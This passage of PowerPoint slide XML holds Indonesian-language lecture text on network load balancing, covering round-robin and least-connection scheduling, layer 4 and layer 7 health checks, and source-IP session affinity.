              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</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112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178880933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Penjadwalan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Algoritme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjadwalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simpul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjadwalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> round robin; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikutnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Metode lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bobot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>preferensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>detak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Afinitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Persistensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sesi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di server farm, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>durasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>afinitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terikat</a:t>
